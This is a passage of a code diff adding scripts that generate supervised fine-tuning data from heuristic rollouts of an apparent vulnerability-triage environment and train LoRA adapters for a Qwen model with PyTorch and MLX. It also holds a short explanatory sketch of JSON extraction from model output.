+    main()
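The brace-matching scan in `extract_last_json_object` can be checked against typical model output, where a `<think>` block may itself contain JSON that must be ignored. A self-contained re-sketch of the same idea (string and escape handling collapsed into one pass; names are illustrative, not the module's API):

```python
import json
import re

THINK_RE = re.compile(r"<think>.*?</think>", re.DOTALL | re.IGNORECASE)


def last_json_object(text: str):
    """Return the last balanced top-level {...} span outside <think> blocks."""
    cleaned = THINK_RE.sub("", text)
    depth = 0
    start = None
    last = None
    in_string = False
    escape = False
    for index, ch in enumerate(cleaned):
        if escape:            # consume one escaped char inside a string
            escape = False
            continue
        if ch == "\\" and in_string:
            escape = True
            continue
        if ch == '"':         # toggle string mode on unescaped quotes
            in_string = not in_string
            continue
        if in_string:         # braces inside strings are not structure
            continue
        if ch == "{":
            if depth == 0:
                start = index
            depth += 1
        elif ch == "}" and depth > 0:
            depth -= 1
            if depth == 0:
                last = cleaned[start : index + 1]
    return last


sample = '<think>{"draft": 1}</think> Final answer: {"action_type": "submit_triage"}'
print(last_json_object(sample))  # {"action_type": "submit_triage"}
```

The JSON inside `<think>` is stripped before scanning, so the extractor keeps only the model's final answer object.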
scripts/generate_sft_data.py ADDED
@@ -0,0 +1,116 @@
+"""Generate resumable SFT data from deterministic heuristic rollouts."""
+
+from __future__ import annotations
+
+import argparse
+import json
+import sys
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+if str(ROOT) not in sys.path:
+    sys.path.insert(0, str(ROOT))
+
+from training_utils import (
+    PROMPT_VARIANTS,
+    append_jsonl,
+    build_text_example,
+    generate_heuristic_transitions,
+    split_for_key,
+    write_json,
+)
+
+
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
+    parser.add_argument("--augmentations", type=int, default=12)
+    parser.add_argument("--eval-ratio", type=float, default=0.2)
+    parser.add_argument("--force", action="store_true")
+    args = parser.parse_args()
+
+    output_root = (ROOT / args.output_root).resolve()
+    data_dir = output_root / "data"
+    transitions_path = data_dir / "transitions.jsonl"
+    train_path = data_dir / "train.jsonl"
+    eval_path = data_dir / "eval.jsonl"
+    manifest_path = output_root / "run_manifest.json"
+
+    if args.force:
+        for path in (transitions_path, train_path, eval_path):
+            if path.exists():
+                path.unlink()
+
+    if transitions_path.exists() and train_path.exists() and eval_path.exists():
+        print(json.dumps({"status": "already_exists", "output_root": str(output_root)}, indent=2))
+        return
+
+    transition_count = 0
+    train_examples = 0
+    eval_examples = 0
+
+    for transition in generate_heuristic_transitions():
+        record = {
+            "task_id": transition.task_id,
+            "difficulty": transition.difficulty,
+            "step_index": transition.step_index,
+            "observation": transition.observation,
+            "action": transition.action,
+            "reward_after_action": transition.reward_after_action,
+            "score_after_action": transition.score_after_action,
+            "done": transition.done,
+        }
+        append_jsonl(transitions_path, record)
+        transition_count += 1
+
+        for augmentation_index in range(args.augmentations):
+            prompt_variant = PROMPT_VARIANTS[augmentation_index % len(PROMPT_VARIANTS)]
+            example = build_text_example(
+                observation=transition.observation,
+                action=transition.action,
+                prompt_variant=prompt_variant,
+            )
+            example_record = {
+                "id": f"{transition.task_id}-step{transition.step_index}-aug{augmentation_index}",
+                "task_id": transition.task_id,
+                "difficulty": transition.difficulty,
+                "step_index": transition.step_index,
+                "prompt_variant": prompt_variant,
+                **example,
+            }
+            split = split_for_key(example_record["id"], args.eval_ratio)
+            append_jsonl(train_path if split == "train" else eval_path, example_record)
+            if split == "train":
+                train_examples += 1
+            else:
+                eval_examples += 1
+
+    write_json(
+        manifest_path,
+        {
+            "status": "data_ready",
+            "output_root": str(output_root),
+            "transition_count": transition_count,
+            "train_examples": train_examples,
+            "eval_examples": eval_examples,
+            "augmentations": args.augmentations,
+            "eval_ratio": args.eval_ratio,
+        },
+    )
+
+    print(
+        json.dumps(
+            {
+                "status": "ok",
+                "output_root": str(output_root),
+                "transition_count": transition_count,
+                "train_examples": train_examples,
+                "eval_examples": eval_examples,
+            },
+            indent=2,
+        )
+    )
+
+
+if __name__ == "__main__":
+    main()
scripts/prepare_mlx_data.py ADDED
@@ -0,0 +1,145 @@
+"""Prepare MLX-LM-compatible train/valid files from existing SFT data."""
+
+from __future__ import annotations
+
+import argparse
+import json
+from pathlib import Path
+from typing import Dict, List
+
+from transformers import AutoTokenizer
+
+
+ROOT = Path(__file__).resolve().parents[1]
+TRUNCATION_MARKER = "\n...[truncated observation]...\n"
+
+
+def load_jsonl(path: Path) -> List[Dict[str, object]]:
+    with path.open("r", encoding="utf-8") as handle:
+        return [json.loads(line) for line in handle if line.strip()]
+
+
+def dump_jsonl(path: Path, rows: List[Dict[str, object]]) -> None:
+    path.parent.mkdir(parents=True, exist_ok=True)
+    with path.open("w", encoding="utf-8") as handle:
+        for row in rows:
+            handle.write(json.dumps(row, sort_keys=True) + "\n")
+
+
+def trim_prompt_to_budget(prompt: str, tokenizer, budget: int) -> str:
+    prompt_ids = tokenizer.encode(prompt, add_special_tokens=False)
+    if len(prompt_ids) <= budget:
+        return prompt
+
+    marker_ids = tokenizer.encode(TRUNCATION_MARKER, add_special_tokens=False)
+    marker_len = len(marker_ids)
+    if budget <= marker_len + 8:
+        return tokenizer.decode(prompt_ids[-budget:])
+
+    remaining = budget - marker_len
+    head_len = max(1, int(remaining * 0.55))
+    tail_len = max(1, remaining - head_len)
+    trimmed_ids = prompt_ids[:head_len] + marker_ids + prompt_ids[-tail_len:]
+    if len(trimmed_ids) > budget:
+        trimmed_ids = trimmed_ids[:budget]
+    return tokenizer.decode(trimmed_ids, skip_special_tokens=False)
+
+
+def rendered_length(prompt: str, completion: str, tokenizer) -> int:
+    messages = [
+        {"role": "user", "content": prompt},
+        {"role": "assistant", "content": completion},
+    ]
+    return len(tokenizer.apply_chat_template(messages, return_dict=False))
+
+
+def normalize_record(record: Dict[str, object], tokenizer, max_seq_length: int) -> tuple[Dict[str, object] | None, Dict[str, int]]:
+    prompt = str(record["prompt"])
+    completion = str(record["completion"])
+
+    stats = {"trimmed": 0, "dropped": 0}
+    completion_ids = tokenizer.encode(completion, add_special_tokens=False)
+    prompt_budget = max_seq_length - len(completion_ids) - 32
+    if prompt_budget <= 0:
+        stats["dropped"] = 1
+        return None, stats
+
+    normalized_prompt = trim_prompt_to_budget(prompt, tokenizer, prompt_budget)
+    while rendered_length(normalized_prompt, completion, tokenizer) > max_seq_length and prompt_budget > 64:
+        prompt_budget = max(64, int(prompt_budget * 0.9))
+        normalized_prompt = trim_prompt_to_budget(prompt, tokenizer, prompt_budget)
+    if rendered_length(normalized_prompt, completion, tokenizer) > max_seq_length:
+        stats["dropped"] = 1
+        return None, stats
+
+    if normalized_prompt != prompt:
+        stats["trimmed"] = 1
+
+    text = f"{normalized_prompt}\n{completion}"
+    normalized = dict(record)
+    normalized["prompt"] = normalized_prompt
+    normalized["text"] = text
+    return normalized, stats
+
+
+def transform_split(src: Path, dst: Path, tokenizer, max_seq_length: int) -> Dict[str, int]:
+    rows = load_jsonl(src)
+    normalized_rows: List[Dict[str, object]] = []
+    stats = {"input_examples": len(rows), "written_examples": 0, "trimmed_examples": 0, "dropped_examples": 0}
+
+    for row in rows:
+        normalized, row_stats = normalize_record(row, tokenizer, max_seq_length)
+        stats["trimmed_examples"] += row_stats["trimmed"]
+        stats["dropped_examples"] += row_stats["dropped"]
+        if normalized is not None:
+            normalized_rows.append(normalized)
+
+    stats["written_examples"] = len(normalized_rows)
+    dump_jsonl(dst, normalized_rows)
+    return stats
+
+
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--source-root", default="artifacts/lora_qwen3_4b/data")
+    parser.add_argument("--output-root", default="artifacts/mlx_qwen3_4b/data")
+    parser.add_argument("--model", default="Qwen/Qwen3-4B")
107
+ parser.add_argument("--max-seq-length", type=int, default=1024)
108
+ parser.add_argument("--include-valid", action="store_true")
109
+ parser.add_argument("--force", action="store_true")
110
+ args = parser.parse_args()
111
+
112
+ source_root = (ROOT / args.source_root).resolve()
113
+ output_root = (ROOT / args.output_root).resolve()
114
+ output_root.mkdir(parents=True, exist_ok=True)
115
+
116
+ tokenizer = AutoTokenizer.from_pretrained(args.model, trust_remote_code=True)
117
+
118
+ mapping = {source_root / "train.jsonl": output_root / "train.jsonl"}
119
+ if args.include_valid:
120
+ mapping[source_root / "eval.jsonl"] = output_root / "valid.jsonl"
121
+
122
+ summary: Dict[str, object] = {
123
+ "model": args.model,
124
+ "max_seq_length": args.max_seq_length,
125
+ "splits": {},
126
+ }
127
+ for src, dst in mapping.items():
128
+ if not src.exists():
129
+ raise FileNotFoundError(f"Missing source file: {src}")
130
+ if dst.exists() and not args.force:
131
+ continue
132
+ summary["splits"][dst.stem] = transform_split(src, dst, tokenizer, args.max_seq_length)
133
+
134
+ valid_path = output_root / "valid.jsonl"
135
+ if not args.include_valid and valid_path.exists():
136
+ valid_path.unlink()
137
+
138
+ summary_path = output_root.parent / "prepare_stats.json"
139
+ summary_path.write_text(json.dumps(summary, indent=2, sort_keys=True) + "\n", encoding="utf-8")
140
+ print(output_root)
141
+ print(json.dumps(summary, indent=2, sort_keys=True))
142
+
143
+
144
+ if __name__ == "__main__":
145
+ main()
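The head/tail split performed by `trim_prompt_to_budget` can be sketched without a real tokenizer. This toy version treats list items as "tokens" and spends one slot on the marker (the real script counts the marker's tokenized length instead); the 0.55 head fraction mirrors the script above.

```python
TRUNCATION_MARKER = "<truncated>"


def trim_tokens(tokens, budget):
    """Keep ~55% of the budget from the head and the rest from the tail,
    inserting a truncation marker between them (toy sketch of
    trim_prompt_to_budget; real tokens are tokenizer ids)."""
    if len(tokens) <= budget:
        return tokens
    remaining = budget - 1  # one slot reserved for the marker
    head_len = max(1, int(remaining * 0.55))
    tail_len = max(1, remaining - head_len)
    return tokens[:head_len] + [TRUNCATION_MARKER] + tokens[-tail_len:]
```

Keeping both ends matters here because the task prompt states the objective at the top and the most recent observation at the bottom; pure tail truncation would drop the instructions.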
scripts/run_lora_pipeline.py ADDED
@@ -0,0 +1,135 @@
"""Run the full resumable local LoRA pipeline."""

from __future__ import annotations

import argparse
import json
import subprocess
import sys
from pathlib import Path

ROOT = Path(__file__).resolve().parents[1]
if str(ROOT) not in sys.path:
    sys.path.insert(0, str(ROOT))

from training_utils import latest_checkpoint, write_json


def run_step(name: str, command: list[str], log_path: Path, output_root: Path) -> None:
    log_path.parent.mkdir(parents=True, exist_ok=True)
    with log_path.open("a", encoding="utf-8") as log_handle:
        log_handle.write(f"\n===== {name} =====\n")
        log_handle.flush()
        write_json(
            output_root / "run_manifest.json",
            {
                "status": "running_step",
                "current_step": name,
                "command": command,
                "latest_checkpoint": str(latest_checkpoint(output_root / "checkpoints")) if (output_root / "checkpoints").exists() else None,
            },
        )
        process = subprocess.run(command, stdout=log_handle, stderr=subprocess.STDOUT, text=True)
    if process.returncode != 0:
        raise SystemExit(process.returncode)


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
    parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
    parser.add_argument("--augmentations", type=int, default=12)
    parser.add_argument("--skip-base-eval", action="store_true")
    args = parser.parse_args()

    output_root = (ROOT / args.output_root).resolve()
    logs_dir = output_root / "logs"
    output_root.mkdir(parents=True, exist_ok=True)

    if not args.skip_base_eval and not (output_root / "metrics" / "eval_before.json").exists():
        run_step(
            "eval_base",
            [
                sys.executable,
                "scripts/evaluate_lora.py",
                "--model",
                args.model,
                "--output-root",
                str(output_root),
                "--output-json",
                str(output_root / "metrics" / "eval_before.json"),
            ],
            logs_dir / "eval_base.log",
            output_root,
        )

    if not (output_root / "data" / "train.jsonl").exists():
        run_step(
            "generate_data",
            [
                sys.executable,
                "scripts/generate_sft_data.py",
                "--output-root",
                str(output_root),
                "--augmentations",
                str(args.augmentations),
            ],
            logs_dir / "generate_data.log",
            output_root,
        )

    run_step(
        "train_lora",
        [
            sys.executable,
            "scripts/train_lora_sft.py",
            "--model",
            args.model,
            "--output-root",
            str(output_root),
        ],
        logs_dir / "train_lora.log",
        output_root,
    )

    run_step(
        "eval_adapter",
        [
            sys.executable,
            "scripts/evaluate_lora.py",
            "--model",
            args.model,
            "--adapter-path",
            str(output_root / "adapter"),
            "--output-root",
            str(output_root),
            "--output-json",
            str(output_root / "metrics" / "eval_after.json"),
        ],
        logs_dir / "eval_adapter.log",
        output_root,
    )

    write_json(
        output_root / "run_manifest.json",
        {
            "status": "finished",
            "output_root": str(output_root),
            "eval_before": str(output_root / "metrics" / "eval_before.json"),
            "training_summary": str(output_root / "training_summary.json"),
            "eval_after": str(output_root / "metrics" / "eval_after.json"),
        },
    )
    print(
        json.dumps(
            {
                "status": "finished",
                "output_root": str(output_root),
            },
            indent=2,
        )
    )


if __name__ == "__main__":
    main()
scripts/run_mlx_benchmark.sh ADDED
@@ -0,0 +1,29 @@
#!/bin/zsh
set -euo pipefail

ROOT="/Users/adithyavardhan/Tweeks/hack"
cd "$ROOT"

python scripts/prepare_mlx_data.py --force
mkdir -p artifacts/mlx_qwen3_4b/logs artifacts/mlx_qwen3_4b/metrics artifacts/mlx_qwen3_4b/adapters

python -m mlx_lm lora \
  --model Qwen/Qwen3.5-4B \
  --train \
  --data "$ROOT/artifacts/mlx_qwen3_4b/data" \
  --mask-prompt \
  --num-layers 8 \
  --batch-size 1 \
  --iters 10 \
  --val-batches 2 \
  --learning-rate 5e-5 \
  --steps-per-report 1 \
  --steps-per-eval 1000 \
  --save-every 10 \
  --grad-accumulation-steps 8 \
  --grad-checkpoint \
  --adapter-path "$ROOT/artifacts/mlx_qwen3_4b/adapters" \
  --max-seq-length 1024 \
  > "$ROOT/artifacts/mlx_qwen3_4b/logs/mlx_lora_benchmark.log" 2>&1

python scripts/save_mlx_speed.py
scripts/run_mlx_training.py ADDED
@@ -0,0 +1,147 @@
"""Run MLX LoRA training as the default local Mac training path."""

from __future__ import annotations

import argparse
import json
import shlex
import subprocess
import sys
from pathlib import Path


ROOT = Path(__file__).resolve().parents[1]
if str(ROOT) not in sys.path:
    sys.path.insert(0, str(ROOT))


def write_json(path: Path, payload: dict) -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
    parser.add_argument("--source-root", default="artifacts/lora_qwen3_4b/data")
    parser.add_argument("--output-root", default="artifacts/mlx_qwen3_4b")
    parser.add_argument("--iters", type=int, default=120)
    parser.add_argument("--batch-size", type=int, default=1)
    parser.add_argument("--grad-accumulation-steps", type=int, default=8)
    parser.add_argument("--learning-rate", type=float, default=5e-5)
    parser.add_argument("--num-layers", type=int, default=8)
    parser.add_argument("--max-seq-length", type=int, default=1024)
    parser.add_argument("--steps-per-report", type=int, default=1)
    parser.add_argument("--save-every", type=int, default=20)
    parser.add_argument("--seed", type=int, default=7)
    parser.add_argument("--fresh-start", action="store_true")
    parser.add_argument("--include-valid", action="store_true")
    args = parser.parse_args()

    output_root = (ROOT / args.output_root).resolve()
    data_root = output_root / "data"
    log_path = output_root / "logs" / "mlx_train.log"
    manifest_path = output_root / "run_manifest.json"
    adapter_root = output_root / "adapters"
    adapter_file = adapter_root / "adapters.safetensors"
    speed_path = output_root / "metrics" / "speed_mlx.json"

    output_root.mkdir(parents=True, exist_ok=True)
    if args.fresh_start:
        for rel in [log_path, speed_path, output_root / "training_summary.json", adapter_file]:
            if rel.exists():
                rel.unlink()

    prepare_cmd = [
        sys.executable,
        "scripts/prepare_mlx_data.py",
        "--source-root",
        args.source_root,
        "--output-root",
        str(data_root.relative_to(ROOT)),
        "--model",
        args.model,
        "--max-seq-length",
        str(args.max_seq_length),
        "--force",
    ]
    if args.include_valid:
        prepare_cmd.append("--include-valid")
    subprocess.run(prepare_cmd, cwd=ROOT, check=True)

    cmd = [
        sys.executable,
        "-m",
        "mlx_lm",
        "lora",
        "--model",
        args.model,
        "--train",
        "--data",
        str(data_root),
        "--mask-prompt",
        "--num-layers",
        str(args.num_layers),
        "--batch-size",
        str(args.batch_size),
        "--iters",
        str(args.iters),
        "--learning-rate",
        str(args.learning_rate),
        "--steps-per-report",
        str(args.steps_per_report),
        "--steps-per-eval",
        "1000000",
        "--save-every",
        str(args.save_every),
        "--grad-accumulation-steps",
        str(args.grad_accumulation_steps),
        "--grad-checkpoint",
        "--adapter-path",
        str(adapter_root),
        "--max-seq-length",
        str(args.max_seq_length),
        "--seed",
        str(args.seed),
    ]
    if not args.fresh_start and adapter_file.exists():
        cmd.extend(["--resume-adapter-file", str(adapter_file)])

    write_json(
        manifest_path,
        {
            "status": "starting_training",
            "trainer": "mlx_lm_lora",
            "model": args.model,
            "data_root": str(data_root),
            "output_root": str(output_root),
            "command": cmd,
            "fresh_start": args.fresh_start,
        },
    )

    log_path.parent.mkdir(parents=True, exist_ok=True)
    with log_path.open("a", encoding="utf-8") as handle:
        handle.write("\n===== mlx_lm_lora =====\n")
        handle.write("COMMAND: " + " ".join(shlex.quote(part) for part in cmd) + "\n")
        handle.flush()
        process = subprocess.run(cmd, cwd=ROOT, stdout=handle, stderr=subprocess.STDOUT, text=True)

    subprocess.run([sys.executable, "scripts/save_mlx_speed.py", "--log-path", str(log_path), "--output-path", str(speed_path)], cwd=ROOT, check=False)

    summary = {
        "status": "finished" if process.returncode == 0 else "failed",
        "trainer": "mlx_lm_lora",
        "return_code": process.returncode,
        "log_path": str(log_path),
        "speed_path": str(speed_path),
        "adapter_root": str(adapter_root),
    }
    write_json(output_root / "training_summary.json", summary)
    write_json(manifest_path, summary)
    if process.returncode != 0:
        raise SystemExit(process.returncode)


if __name__ == "__main__":
    main()
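The `COMMAND: ...` line the script appends to `mlx_train.log` is built by shell-quoting each argv element, so the logged string can be copy-pasted and re-run verbatim. A minimal sketch (the sample path is made up):

```python
import shlex

# Quote each argv element the same way run_mlx_training.py does before
# writing the command line to the log; only unsafe parts get quoted.
cmd = ["python", "-m", "mlx_lm", "lora", "--data", "path with spaces/data"]
logged = "COMMAND: " + " ".join(shlex.quote(part) for part in cmd)
```

`shlex.quote` leaves plain tokens untouched and wraps anything with spaces or shell metacharacters in single quotes.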
scripts/save_mlx_speed.py ADDED
@@ -0,0 +1,48 @@
"""Save a small speed summary from an MLX LoRA training log."""

from __future__ import annotations

import argparse
import json
import re
from pathlib import Path


ROOT = Path(__file__).resolve().parents[1]
REPORT_RE = re.compile(r"Iter\s+(\d+):\s+Train loss.*?It/sec\s+([0-9.]+)", re.IGNORECASE)


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument("--log-path", default="artifacts/mlx_qwen3_4b/logs/mlx_lora_benchmark.log")
    parser.add_argument("--output-path", default="artifacts/mlx_qwen3_4b/metrics/speed_mlx.json")
    args = parser.parse_args()

    log_path = (ROOT / args.log_path).resolve()
    output_path = (ROOT / args.output_path).resolve()
    text = log_path.read_text(encoding="utf-8") if log_path.exists() else ""

    records = []
    for step, it_per_sec in REPORT_RE.findall(text):
        itps = float(it_per_sec)
        records.append(
            {
                "step": int(step),
                "iterations_per_second": itps,
                "seconds_per_step_estimate": 1.0 / itps if itps > 0 else None,
            }
        )

    payload = {
        "method": "mlx_lm_lora",
        "source_log": str(log_path),
        "records": records,
        "latest_seconds_per_step": records[-1]["seconds_per_step_estimate"] if records else None,
    }
    output_path.parent.mkdir(parents=True, exist_ok=True)
    output_path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
    print(json.dumps(payload, indent=2, sort_keys=True))


if __name__ == "__main__":
    main()
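The `REPORT_RE` pattern can be exercised in isolation. The sample line below is synthetic, merely shaped like an `mlx_lm` progress report (the real log wording and fields may differ):

```python
import re

# Same pattern as REPORT_RE in save_mlx_speed.py: capture the iteration
# number and the iterations-per-second figure from a report line.
REPORT_RE = re.compile(r"Iter\s+(\d+):\s+Train loss.*?It/sec\s+([0-9.]+)", re.IGNORECASE)

# Synthetic line for illustration, not captured from a real run.
line = "Iter 10: Train loss 2.431, Learning Rate 5.000e-05, It/sec 0.084, Tokens/sec 86.2"
step, it_per_sec = REPORT_RE.findall(line)[0]
seconds_per_step = 1.0 / float(it_per_sec)  # same inversion as the script
```

Note the non-greedy `.*?` keeps the second group anchored to the first `It/sec` occurrence on the line.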
scripts/save_pytorch_baseline_speed.py ADDED
@@ -0,0 +1,47 @@
"""Save a small speed summary from the current PyTorch training log."""

from __future__ import annotations

import json
import re
from pathlib import Path


ROOT = Path(__file__).resolve().parents[1]
LOG_PATH = ROOT / "artifacts" / "lora_qwen3_4b" / "logs" / "train_lora_manual.log"
OUT_PATH = ROOT / "artifacts" / "lora_qwen3_4b" / "metrics" / "speed_baseline_pytorch.json"


STEP_RE = re.compile(r"(\d+)%\|.*?\|\s+(\d+)/(\d+)\s+\[(\d+):(\d+)<")


def main() -> None:
    text = LOG_PATH.read_text(encoding="utf-8") if LOG_PATH.exists() else ""
    matches = STEP_RE.findall(text)
    records = []
    for _pct, step, total, mins, secs in matches:
        step_num = int(step)
        elapsed_s = int(mins) * 60 + int(secs)
        if step_num > 0:
            records.append(
                {
                    "step": step_num,
                    "total_steps": int(total),
                    "elapsed_seconds": elapsed_s,
                    "seconds_per_step_estimate": elapsed_s / step_num,
                }
            )

    payload = {
        "method": "pytorch_mps_lora",
        "source_log": str(LOG_PATH),
        "records": records,
        "latest_seconds_per_step": records[-1]["seconds_per_step_estimate"] if records else None,
    }
    OUT_PATH.parent.mkdir(parents=True, exist_ok=True)
    OUT_PATH.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
    print(json.dumps(payload, indent=2, sort_keys=True))


if __name__ == "__main__":
    main()
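`STEP_RE` parses tqdm-style progress lines from the Trainer log. A standalone check against a synthetic line (the bar characters and trailing rate text are assumptions about the tqdm output shape):

```python
import re

# Same pattern as STEP_RE in save_pytorch_baseline_speed.py: capture
# percent, step/total, and elapsed minutes:seconds from a tqdm bar line.
STEP_RE = re.compile(r"(\d+)%\|.*?\|\s+(\d+)/(\d+)\s+\[(\d+):(\d+)<")

# Synthetic tqdm-style line for illustration.
line = "50%|#####     | 5/10 [01:40<01:40, 20.00s/it]"
_pct, step, total, mins, secs = STEP_RE.findall(line)[0]
elapsed_s = int(mins) * 60 + int(secs)
seconds_per_step = elapsed_s / int(step)  # same estimate as the script
```

Because tqdm only reports elapsed time since the bar started, this estimate is an average over all completed steps, not an instantaneous rate.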
scripts/start_mlx_training.sh ADDED
@@ -0,0 +1,13 @@
#!/bin/zsh
set -euo pipefail

ROOT="/Users/adithyavardhan/Tweeks/hack"
cd "$ROOT"

mkdir -p artifacts/mlx_qwen3_4b/logs

python scripts/run_mlx_training.py \
  --model Qwen/Qwen3.5-4B \
  --output-root artifacts/mlx_qwen3_4b \
  --fresh-start \
  "$@"
scripts/train_lora_sft.py ADDED
@@ -0,0 +1,261 @@
"""Run resumable LoRA SFT against the vulnops heuristic dataset."""

from __future__ import annotations

import argparse
import json
import math
import sys
from pathlib import Path
from typing import Dict, List

import torch
from torch.utils.data import Dataset
from transformers import (
    AutoModelForCausalLM,
    AutoTokenizer,
    DataCollatorForSeq2Seq,
    Trainer,
    TrainerCallback,
    TrainingArguments,
)

ROOT = Path(__file__).resolve().parents[1]
if str(ROOT) not in sys.path:
    sys.path.insert(0, str(ROOT))

from training_utils import (
    detect_device,
    latest_checkpoint,
    load_jsonl,
    preferred_torch_dtype,
    set_default_env,
    write_json,
)


class JsonlSFTDataset(Dataset):
    """Mask prompt tokens so only the completion contributes to the loss."""

    def __init__(self, records: List[Dict[str, object]], tokenizer, max_length: int):
        self.examples: List[Dict[str, List[int]]] = []
        for record in records:
            prompt = str(record["prompt"])
            completion = str(record["completion"])
            prompt_ids = tokenizer(prompt, add_special_tokens=False)["input_ids"]
            completion_ids = tokenizer(completion, add_special_tokens=False)["input_ids"] + [tokenizer.eos_token_id]

            input_ids = (prompt_ids + completion_ids)[:max_length]
            labels = ([-100] * len(prompt_ids) + completion_ids)[:max_length]
            attention_mask = [1] * len(input_ids)
            self.examples.append(
                {
                    "input_ids": input_ids,
                    "labels": labels,
                    "attention_mask": attention_mask,
                }
            )

    def __len__(self) -> int:
        return len(self.examples)

    def __getitem__(self, index: int) -> Dict[str, List[int]]:
        return self.examples[index]


class JsonlMetricLogger(TrainerCallback):
    """Append metrics during training so partial runs are still inspectable."""

    def __init__(self, output_root: Path):
        self.output_root = output_root
        self.metrics_path = output_root / "metrics" / "train_metrics.jsonl"
        self.manifest_path = output_root / "run_manifest.json"

    def on_log(self, args, state, control, logs=None, **kwargs):
        if not logs:
            return
        payload = {
            "global_step": int(state.global_step),
            "epoch": float(state.epoch or 0.0),
            **{key: float(value) if isinstance(value, (int, float)) else value for key, value in logs.items()},
        }
        self.metrics_path.parent.mkdir(parents=True, exist_ok=True)
        with self.metrics_path.open("a", encoding="utf-8") as handle:
            handle.write(json.dumps(payload, sort_keys=True) + "\n")
        write_json(
            self.manifest_path,
            {
                "status": "training",
                "global_step": int(state.global_step),
                "epoch": float(state.epoch or 0.0),
                "best_model_checkpoint": state.best_model_checkpoint,
                "log_history_entries": len(state.log_history),
            },
        )


class AbortOnInvalidLoss(TrainerCallback):
    """Stop training early when the run becomes numerically invalid."""

    def on_log(self, args, state, control, logs=None, **kwargs):
        if not logs:
            return control
        for key in ("loss", "eval_loss", "grad_norm"):
            value = logs.get(key)
            if isinstance(value, (int, float)) and not math.isfinite(float(value)):
                control.should_training_stop = True
                break
        return control


def build_training_args(args, output_root: Path, use_cpu: bool) -> TrainingArguments:
    warmup_steps = max(1, int(args.warmup_ratio * args.estimated_train_steps))
    return TrainingArguments(
        output_dir=str(output_root / "checkpoints"),
        num_train_epochs=args.num_train_epochs,
        per_device_train_batch_size=args.per_device_train_batch_size,
        per_device_eval_batch_size=args.per_device_eval_batch_size,
        gradient_accumulation_steps=args.gradient_accumulation_steps,
        learning_rate=args.learning_rate,
        warmup_steps=warmup_steps,
        optim="adamw_torch",
        weight_decay=args.weight_decay,
        logging_strategy="steps",
        logging_steps=args.logging_steps,
        logging_first_step=True,
        eval_strategy="no",
        save_strategy="steps",
        save_steps=args.save_steps,
        save_total_limit=3,
        report_to="none",
        remove_unused_columns=False,
        dataloader_num_workers=0,
        dataloader_pin_memory=False,
        gradient_checkpointing=True,
        lr_scheduler_type="cosine",
        load_best_model_at_end=False,
        use_cpu=use_cpu,
        fp16=False,
        bf16=False,
        max_grad_norm=0.5,
        seed=args.seed,
    )


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
    parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
    parser.add_argument("--max-length", type=int, default=1536)
    parser.add_argument("--num-train-epochs", type=float, default=6.0)
    parser.add_argument("--per-device-train-batch-size", type=int, default=1)
    parser.add_argument("--per-device-eval-batch-size", type=int, default=1)
    parser.add_argument("--gradient-accumulation-steps", type=int, default=8)
    parser.add_argument("--learning-rate", type=float, default=5e-5)
    parser.add_argument("--warmup-ratio", type=float, default=0.1)
    parser.add_argument("--weight-decay", type=float, default=0.0)
    parser.add_argument("--logging-steps", type=int, default=5)
    parser.add_argument("--save-steps", type=int, default=10)
    parser.add_argument("--seed", type=int, default=7)
    parser.add_argument("--fresh-start", action="store_true")
    args = parser.parse_args()

    try:
        from peft import LoraConfig, TaskType, get_peft_model
    except ImportError as exc:
        raise RuntimeError("Install peft before running LoRA training.") from exc

    output_root = (ROOT / args.output_root).resolve()
    data_dir = output_root / "data"
    train_records = load_jsonl(data_dir / "train.jsonl")
    eval_records = load_jsonl(data_dir / "eval.jsonl")
    if not train_records or not eval_records:
        raise RuntimeError("Missing train/eval JSONL data. Run scripts/generate_sft_data.py first.")

    set_default_env(output_root)
    device = detect_device()
    use_cpu = device == "cpu"
    torch_dtype = torch.float32 if device == "mps" else preferred_torch_dtype(device)

    tokenizer = AutoTokenizer.from_pretrained(args.model, trust_remote_code=True)
    if tokenizer.pad_token is None:
        tokenizer.pad_token = tokenizer.eos_token

    model = AutoModelForCausalLM.from_pretrained(
        args.model,
        torch_dtype=torch_dtype,
        trust_remote_code=True,
        low_cpu_mem_usage=True,
    )
    model.config.use_cache = False
    if hasattr(model, "enable_input_require_grads"):
        model.enable_input_require_grads()

    lora_config = LoraConfig(
        task_type=TaskType.CAUSAL_LM,
        r=16,
        lora_alpha=32,
        lora_dropout=0.05,
        target_modules=["q_proj", "k_proj", "v_proj", "o_proj", "gate_proj", "up_proj", "down_proj"],
        bias="none",
    )
    model = get_peft_model(model, lora_config)

    if device in {"cuda", "mps"}:
        model.to(device)

    train_dataset = JsonlSFTDataset(train_records, tokenizer, args.max_length)
    eval_dataset = JsonlSFTDataset(eval_records, tokenizer, args.max_length)
    data_collator = DataCollatorForSeq2Seq(tokenizer=tokenizer, model=model, padding=True)
    updates_per_epoch = max(
        1,
        math.ceil(len(train_dataset) / (args.per_device_train_batch_size * args.gradient_accumulation_steps)),
    )
    args.estimated_train_steps = max(1, math.ceil(args.num_train_epochs * updates_per_epoch))
    training_args = build_training_args(args, output_root, use_cpu)

    trainer = Trainer(
        model=model,
        args=training_args,
        train_dataset=train_dataset,
        eval_dataset=eval_dataset,
        processing_class=tokenizer,
        data_collator=data_collator,
        callbacks=[JsonlMetricLogger(output_root), AbortOnInvalidLoss()],
    )

    checkpoint_dir = output_root / "checkpoints"
    resume_checkpoint = None if args.fresh_start else latest_checkpoint(checkpoint_dir)
    write_json(
        output_root / "run_manifest.json",
        {
            "status": "starting_training",
            "device": device,
            "model": args.model,
            "train_examples": len(train_dataset),
            "eval_examples": len(eval_dataset),
            "estimated_train_steps": args.estimated_train_steps,
